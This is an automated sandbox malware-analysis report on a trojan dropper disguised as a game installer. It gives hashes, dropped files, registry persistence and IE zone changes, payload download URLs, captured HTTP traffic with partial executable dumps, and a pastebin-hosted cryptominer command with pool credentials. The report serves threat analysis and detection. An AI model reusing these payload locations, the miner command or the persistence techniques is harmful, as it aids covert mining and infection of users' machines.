Trojan.Generic.12062800_318269f59a
Susp_Dropper (Kaspersky), Trojan.Generic.12062800 (AdAware), Installer.Win32.InnoSetup.FD, Trojan.Win32.Iconomon.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Installer, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Requires JavaScript enabled! |
---|
MD5: 318269f59a3ec04c48cfc6c2e83d7ade
SHA1: 194f14941a999ffeba984cdbf1c6c9633282efd1
SHA256: 60a763315c7441a303cfa97548a8c053a140d61f17e0a7f5eba93ff7a7ac4028
SSDeep: 49152:TWM9mGWuNxrbhV2OGRJ5BaEKSIztVfHNG2i2QCf2U779q5MC/DsLyGd g iV3ZR2:TR/TvVBwzLKdztVfor2QCfTtqctJdZR2
Size: 2753024 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, BorlandDelphiv30, UPolyXv05_v6
Company: end
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXPESX SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
msvs.exe:532
mscorsvw.exe:1912
setup.tmp:1772
%original file name%.exe:1368
updater6.exe:1264
The Trojan injects its code into the following process(es):
setup.tmp:864
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process setup.tmp:864 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\Uninstall_Icon.ico (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\ISMD5.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\Question_Icon.ico (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\en.isl (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\WinTB.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\ISDone.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\ReadMeEn.rtf (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\cancel.ico (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\ru.isl (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\ISLogo.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\ReadMeRu.rtf (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\logo.png (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\Game.ico (601 bytes)
The process setup.tmp:1772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-99IT4.tmp\setup.tmp (22433 bytes)
The process %original file name%.exe:1368 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Adobe\Updater6\updater6.exe (146 bytes)
The process updater6.exe:1264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Intel\Services\msvs.exe (67 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Updater6\services.exe (15021 bytes)
Registry activity
The process msvs.exe:532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DE 55 01 BF 6C 2D D5 27 3F 7C 97 B8 1F BB 7C 7F"
The process mscorsvw.exe:1912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "2340000"
The process setup.tmp:864 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C E6 73 D6 7E BE A8 23 BC 7B B0 4E 43 4A DA 68"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
The process setup.tmp:1772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C 33 C8 F6 74 97 3B 22 80 92 E2 F2 4C 1E AB 9D"
The process %original file name%.exe:1368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 1C E4 94 87 4F D6 3E CC 24 3F B0 96 F6 C8 52"
The process updater6.exe:1264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 E4 95 50 6A 1C A0 6D 14 3F CD E5 48 30 95 10"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data\Intel\Services]
"msvs.exe" = "Local Management Service"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data\Adobe\Updater6]
"SERVICES.EXE" = "services"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Intel(R) Local Management Service" = "%Documents and Settings%\%current user%\Application Data\Intel\Services\msvs.exe"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Dropped PE files
MD5 | File path |
---|---|
4bfa7fc3abecf01c6581fb87c271cf3e | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Adobe\Updater6\adobeservice.exe |
2b1ca2c0679d9452945b204dda2e220d | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Adobe\Updater6\libcurl.dll |
a9f8f35cc2caf8dba7167b91420a680b | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Adobe\Updater6\libeay32.dll |
56295c7afe3f0542d59d12ca955380db | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Adobe\Updater6\libidn-11.dll |
9a836696f6c5edbcb42f32e28cf4d28d | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Adobe\Updater6\librtmp.dll |
21233827ea5e30fdc086e25b1471a617 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Adobe\Updater6\libssh2.dll |
8df023b6765b21cdf937a25d9d8f14e2 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Adobe\Updater6\pdcurses.dll |
ce931021e18f385f519e945a8a10548e | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Adobe\Updater6\pthreadGC2.dll |
26c74203862342d3f274646c872d9d86 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Adobe\Updater6\services.exe |
612b2747d39d9ef838ab9eacbc1f6c3a | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Adobe\Updater6\ssleay32.dll |
1e2d8f38b32f79db09f475c746a6e6e6 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Adobe\Updater6\updater6.exe |
e4d7dd0a413519b21621ccb7d1d78fa4 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Adobe\Updater6\zlib1.dll |
3d18afda27d21177ae354fd1a1f54353 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Intel\Services\msvs.exe |
5577b6590dd37e9217273379bd949ca7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-99IT4.tmp\setup.tmp |
34b88e02562a274b786f3e2a2caa4697 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-SQHIE.tmp\ISDone.dll |
a38c6ba7377ae98ea908db572e9407c9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-SQHIE.tmp\ISLogo.dll |
cd7bf74954df6fb87efd8a97b9c7c7ad | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-SQHIE.tmp\ISMD5.dll |
8dbb3b555333b9350228f5ea4cfd0f9f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-SQHIE.tmp\WinTB.dll |
92dc6ef532fbb4a5c3201469a5b5eb63 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-SQHIE.tmp\_isetup\_shfoldr.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: CI Games
Product Name:
Product Version: 3.4.4.6290
Legal Copyright: nik1967, Shegorat, ProFrager
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description:
Comments: This installation was built with Inno Setup.
Language: English
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
CODE | 4096 | 31612 | 31744 | 4.46309 | 1e12323dd630a88fb63316b5595bee4d |
DATA | 36864 | 1056 | 1536 | 2.0504 | e05de3d717118968b1d9a3467f53e324 |
BSS | 40960 | 1965 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 45056 | 1902 | 2048 | 3.00343 | 0094297cd60e4d56b7715e263267622b |
.tls | 49152 | 8 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 53248 | 24 | 512 | 0.14174 | 9c4fc312281d2d91bc227cd8fe0aa9f1 |
.reloc | 57344 | 3060 | 3072 | 4.53868 | 55d085fa0ecf1047b1742e17d96e4a2b |
.rsrc | 61440 | 2713088 | 2713088 | 5.49506 | dc0f4b8277c6d22de09fc4301022daf7 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
URL | IP |
---|---|
hxxp://dver.worldnet.us/ilmsrad.dat | ![]() |
hxxp://dver.worldnet.us/rad.dat | ![]() |
hxxp://pastebin.com/raw.php?i=AJxjbBcK | ![]() |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5.
Traffic
GET /ilmsrad.dat HTTP/1.0
Host: dver.worldnet.us
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
HTTP/1.1 200 OK
Server: Apache/2
Last-Modified: Thu, 16 Oct 2014 11:12:28 GMT
ETag: "10600-5058852e53f00"
Vary: User-Agent
Content-Length: 67072
Accept-Ranges: bytes
Date: Sat, 06 Dec 2014 13:39:59 GMT
Connection: keep-aliveMZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
.........v....................@..........................`............
.......@.......................................X......................
......................................................................
..............CODE................................ ..`DATA............
....................@...BSS......................................idata
..............................@....tls................................
.....rdata..............................@..P.reloc....................
..........@..P.rsrc....X.......X..................@..P.............`..
....................@..P..............................................
......................................................................
..............................................@...StringX.@...........
..................X.@..........1@..1@..1@..1@..1@..0@..0@..0@..TObject
.%H.@....%D.@....%@.@....%<.@....%8.@....%\.@....%4.@....%0.@....%X
.@....%,.@....%(.@....%$.@....% .@....%..@....%..@....%..@....%..@....
%..@....%..@....%..@....%T.@....%..@....%..@....%l.@....%h.@....%d.@..
..%..@....%x.@....%t.@....%..@....%..@....%..@....%..@...S........T.q.
...D$,.t...\$0....D[....%..@....%..@....%..@....%..@....%..@....%..@..
..%..@....%..@...S......@..;.uYhD...j.......D$..|$..u.3...$.P.D$..<<< skipped >>>
GET /raw.php?i=AJxjbBcK HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: pastebin.com
Cache-Control: no-cache
Connection: Close
HTTP/1.1 200 OK
Date: Sat, 06 Dec 2014 13:40:07 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Set-Cookie: __cfduid=dd25e1682d98f818dade85a3193187d571417873207; expires=Sun, 06-Dec-15 13:40:07 GMT; path=/; domain=.pastebin.com; HttpOnly
X-Powered-By: PHP/5.5.5
Set-Cookie: cookie_key=1; expires=Sat, 03-Jan-2015 13:40:07 GMT; Max-Age=2419200; path=/; domain=.pastebin.com
Set-Cookie: realuser=1; expires=Sun, 07-Dec-2014 13:40:07 GMT; Max-Age=86400; path=/
Vary: Accept-Encoding
Server: cloudflare-nginx
CF-RAY: 1948e4bc77910773-EWR<html><body>..<div class='fixed'>-k x11mod -o stratu
m tcp://stratum1.suchpool.pw:3335 -u lego.1 -p 123 -I 15</div>..
</body></html>..
GET /rad.dat HTTP/1.0
Host: dver.worldnet.us
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
HTTP/1.1 200 OK
Server: Apache/2
Last-Modified: Thu, 16 Oct 2014 11:12:33 GMT
ETag: "21fdc4-5058853318a40"
Vary: User-Agent
Content-Length: 2227652
Accept-Ranges: bytes
Date: Sat, 06 Dec 2014 13:40:00 GMT
Connection: keep-aliveMZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........*...KaU.KaU
.KaU.3.U.KaU.3.UHKaU.3.U.KaU.K`U)KaU.3.U.KaU.3.U.KaU.3.U.KaU.3.U.KaURi
ch.KaU................PE..L......S............................ .......
......@..........................p....................................
......3............ ..HD..............................................
................@............................................text...c.
.......................... ..`.rdata..#P.......R..................@..@
.data...............................@....rsrc...HD... ...F............
......@..@............................................................
......................................................................
......................................................................
......................................................................
......................................................................
................................................B......QV...u...h/...E
.............$...E..............E.........L....E...~M...M...N@.rM...M.
^d........3..|$..rJ.L$..9RuA.|$..r:.y.au4.y.ru..y.!u(.y..u".y..u..I...
u.j......u.j......u.j.X.....j...,.....(....P..U....<....t..E...@...
.E...0....u..E.....E...E.]....D$.V...F..N.;N.v_.F.SUW.l:C...t.;.v.Ph..
B.U..R.........Q...F.......D. .N...;.w...S.6.<.....YY..u.....Q...&g
t;_].^.[^...V...L$......P..F..V...^.........j..p..p..R......t.P.[...Y.
.D$.V...F..N.;N.v`.F.SUW.l:C...t.;.v.Ph..B.U.gQ.........Q...F..~..<<< skipped >>>
The Trojan connects to the servers at the folowing location(s):
.text
`.itext
`.data
.idata
.rdata
@.rsrc
ENoMonitorSupportException
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
EVariantBadIndexError
Inno Setup Setup Data (5.5.0) (u)
Inno Setup Messages (5.5.0) (u)
oleaut32.dll
advapi32.dll
RegOpenKeyExW
RegCloseKey
user32.dll
GetKeyboardType
kernel32.dll
MsgWaitForMultipleObjects
ExitWindowsEx
GetWindowsDirectoryW
GetCPInfo
comctl32.dll
NNFTP6FaiaB
.YdKA
qLCmd|D
lX%CP
0,.xP,`
3O?E%C
KWindows
UrlMon
6MsgIDs
Msgs
name="JR.Inno.Setup"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
.DEFAULT\Control Panel\International
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
LzmaDecode failed (%d)
shell32.dll
/SL5="$%x,%d,%d,
Invalid file name - %s
Wed(Monitor support function not initialized
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation
1.0.0.0
3.4.4.6290
setup.tmp_864:
.text
`.itext
`.data
.idata
.rdata
@.rsrc
Windows
ENoMonitorSupportException
.uvCOu
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
Uh.OA
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
EInvalidGraphicOperation
TPent%C
PasswordChar
OnKeyDown
OnKeyPressLkR
OnKeyUp
ssHorizontal
TCustomButton.TButtonStyle
msShiftSelect
ArrowKeys
THKInvalidKey
THKInvalidKeys
TCustomHotKey
THotKeyh
THotKey
HotKey
InvalidKeys
vsReport
Uh3%F
TComboBoxExEnumerator
EXPORT
TPSExec
TPSRuntimeClassImporterP;U
TPSExportedVar
TPSCustomDebugExec
TPSDebugExec
Monochrome
SHORTCUTTOKEY
AUTOHOTKEYS
RETHINKHOTKEYS
OnKeyPress
t.Htb
1.2.1
TPasswordEdit
TPasswordEditHWL
PasswordEdit*
Password
PasswordPage
PasswordLabel
PasswordEdit
PasswordEditLabel
GetPassword
CheckPassword
<requestedExecutionLevel level="
IMsg
FormKeyDown
PasswordCheckHash
TKeyNameConst
TOutputMsgWizardPage
TOutputMsgMemoWizardPage
MsgLabel
Msg1Label
Msg2Label
function CreateOutputMsgPage(const AfterID: Integer; const ACaption, ADescription, AMsg: String): TOutputMsgWizardPage;
function CreateOutputMsgMemoPage(const AfterID: Integer; const ACaption, ADescription, ASubCaption: String; const AMsg: AnsiString): TOutputMsgMemoWizardPage;
function MsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons: Integer): Integer;
function GetIniString(const Section, Key, Default, Filename: String): String;
function GetIniInt(const Section, Key: String; const Default, Min, Max: Longint; const Filename: String): Longint;
function GetIniBool(const Section, Key: String; const Default: Boolean; const Filename: String): Boolean;
function IniKeyExists(const Section, Key, Filename: String): Boolean;
function SetIniString(const Section, Key, Value, Filename: String): Boolean;
function SetIniInt(const Section, Key: String; const Value: Longint; const Filename: String): Boolean;
function SetIniBool(const Section, Key: String; const Value: Boolean; const Filename: String): Boolean;
procedure DeleteIniEntry(const Section, Key, Filename: String);
function GetCmdTail: String;
function StringChangeEx(var S: String; const FromStr, ToStr: String; const SupportDBCS: Boolean): Integer;
function RegValueExists(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegQueryStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegQueryMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegDeleteKeyIncludingSubkeys(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegDeleteKeyIfEmpty(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegKeyExists(const RootKey: Integer; const SubKeyName: String): Boolean;
function RegDeleteValue(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegGetSubkeyNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegGetValueNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegQueryDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultDWord: Cardinal): Boolean;
function RegQueryBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: AnsiString): Boolean;
function RegWriteStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteExpandStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: Cardinal): Boolean;
function RegWriteBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: AnsiString): Boolean;
function MsgBoxEx(hWnd: Longword; AText, ACaption: string; AType, AIcon: Longword; ATimeOut: Integer): Integer;
function InputBoxEx(hWnd: Longword; AText, ACaption, ADefaut, APasswordChar: string; AIcon: Longword; AWidth, AHeight, ATimeOut: Integer; var AResultStr: String): Boolean;
procedure SetPassword(const Password: String);
function CheckForMutexes(Mutexes: String): Boolean;
function Exec(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ExecAsOriginalUser(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ShellExec(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function ShellExecAsOriginalUser(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function MakePendingFileRenameOperationsChecksum: String;
function CreateShellLink(const Filename, Description, ShortcutTo, Parameters, WorkingDir, IconFilename: String; const IconIndex, ShowCmd: Integer): String;
function ExitSetupMsgBox: Boolean;
function GetWindowsVersion: Cardinal;
procedure GetWindowsVersionEx(var Version: TWindowsVersion);
function GetWindowsVersionString: String;
function SuppressibleMsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons, Default: Integer): Integer;
function CustomMessage(const MsgName: String): String;
function SendMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Longint;
function PostMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendNotifyMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastMessage(const Msg, WParam, LParam: Longint): Longint;
function PostBroadcastMessage(const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastNotifyMessage(const Msg, WParam, LParam: Longint): Boolean;
procedure RaiseException(const Msg: String);
function SetSetupPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;
function SetPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;
Uh.QP
IMsgt
CREATEOUTPUTMSGPAGE
CREATEOUTPUTMSGMEMOPAGE
MSGBOX
INIKEYEXISTS
GETCMDTAIL
REGKEYEXISTS
REGDELETEKEYINCLUDINGSUBKEYS
REGDELETEKEYIFEMPTY
REGGETSUBKEYNAMES
MSGBOXEX
SETPASSWORD
CHECKFORMUTEXES
SHELLEXEC
SHELLEXECASORIGINALUSER
MAKEPENDINGFILERENAMEOPERATIONSCHECKSUM
EXITSETUPMSGBOX
GETWINDOWSVERSION
GETWINDOWSVERSIONSTRING
SUPPRESSIBLEMSGBOX
GetWindowsVersionEx
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
TKeyEvent
TKeyPressEvent
HelpKeyword
AutoHotkeys
Inno Setup Setup Data (5.5.0) (u)
Inno Setup Messages (5.5.0) (u)
oleaut32.dll
advapi32.dll
RegOpenKeyExW
RegCloseKey
user32.dll
GetKeyboardType
kernel32.dll
UnhookWindowsHookEx
SetWindowsHookExW
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjects
MapVirtualKeyW
LoadKeyboardLayoutW
GetKeyboardState
GetKeyboardLayoutNameW
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextW
ExitWindowsEx
EnumWindows
EnumThreadWindows
EnumChildWindows
ActivateKeyboardLayout
msimg32.dll
gdi32.dll
SetViewportOrgEx
version.dll
mpr.dll
TransactNamedPipe
SetNamedPipeHandleState
GetWindowsDirectoryW
GetCPInfo
CreateNamedPipeW
RegQueryInfoKeyW
RegFlushKey
RegEnumKeyExW
RegDeleteKeyW
RegCreateKeyExW
ole32.dll
comctl32.dll
winspool.drv
shell32.dll
ShellExecuteExW
ShellExecuteW
comdlg32.dll
!%FKO=EH4<@8?F )-
"""<<<&&&
024)%,,)1
4Ib%5Xs~
##ÿI*,.
%)(/6(05
$( 4*/8-1=/4>
556???,,,
!%'#)*)-/458:<?569-.1'),))-'( !$%
"(&0; 3<
!#!')$ ,(.0*.1 /2%),
S^|EWz;Pv.Dd7JjYi
$#"976$##
'(! 2(.;
=-6;$ 1
$&!(*% -%*, %'
##'0"',,23
:88-,,-,,
"(/18>"*/
"!&(#(*)-/(-/$) %'
657304516
"$& -,13 02-24 13',.!&(',.7=>&)-
'.6')5$(6 )8
'&(0/1869
$&!&( %'(-/-242795:<168/46',.
#/"'3#(4
((,5%*4 !/
"$',.& -*/138:6;=279057-24(-/%),$&*%**
/01$',15@
":<==>=.2/
#.%*6-2>
%*,*/1,13-24/46& -
.35 02( /)*/"''
$.!&1-2>$)6
! #(3)3@
#EQVVb35A#&4
$*)/4 1629>!'-
0575:<38:49;*/1$) "')
**.dcf
!#&'03114.ae\fh]46 9;1=?5?A7FI>PSFNQE[^U@C>XZWY_Z4<7/73FKL?DG6:=;@Bjoqinp`dh
%)3 % !&, %)
',.37;%*.
"( #',
$&%*, 1437<128..5037;?@"&'&(
!'#&,"',
((-TTWklqz}
#().0-24& -
"$,2349;*.3/38.27,05( 1).2)./$) #(*
'''&&&'''
#( /4 /4
!%!&().0%*,
#8:7;>(,1$(-&*/' 0"&
$%).,05$'-
#%(-/056*.1$(-(,1"&
#,04(,0!&*%)./38' 0
"#,34.7929:,20
!$&'()*=>?$&(
!' &2&*8
$(#&,26;049
,45 35)1/.308;;
! !!!&(,"(1$ 6
!& $)"&
!&)-237<!%*
#'.Wepz
#"& #',!%* $) $)!%* $)
!* $,/2:68<::<877998.0/
765=<: //0
#(#', $) $)(,1 $)
58@),1368-./)(*
!% %(%*- %(
$(058 03
'#. &1.(55.985943953"
.JThMUh
'.0725<%(/
!(%'/%'/
!)/29'*1
"1$&0&&6$#8#"1
!&(&*-*3629<98;74639:724.CE=SUIXXJ]^P\]OceWY]ODH;GJ?PSM?DBJNMUYX[^_cfggml
!"#&&!""
&!$ &)0"%,
#"*/038 !$
#3%'3""5$"8('6$$*
'1$0;*3<
")"%,!$
"'$(-*.3*.3038.2717<39>
!0 #4$%;$"8""3""/
, ".()5/048:?37?
QV[(,137<-16(,1/38.27.27,05.27 /447<>ABCHIKQTV^`\ehjsuv}
03:!$ #',
%(/#&-/2925<),3 #* .5
"1%':(*>&':&'712>/19(-5
&(($$&!
#/%.4>EHJLN./.#$!12.QPN=<8&$ GGEKKIJJI665
!,!#-!#-"$.HJT>@J
>>>???444%%%
\\],,,
'-07039-0726;,05$(-' 0' 0*.347<
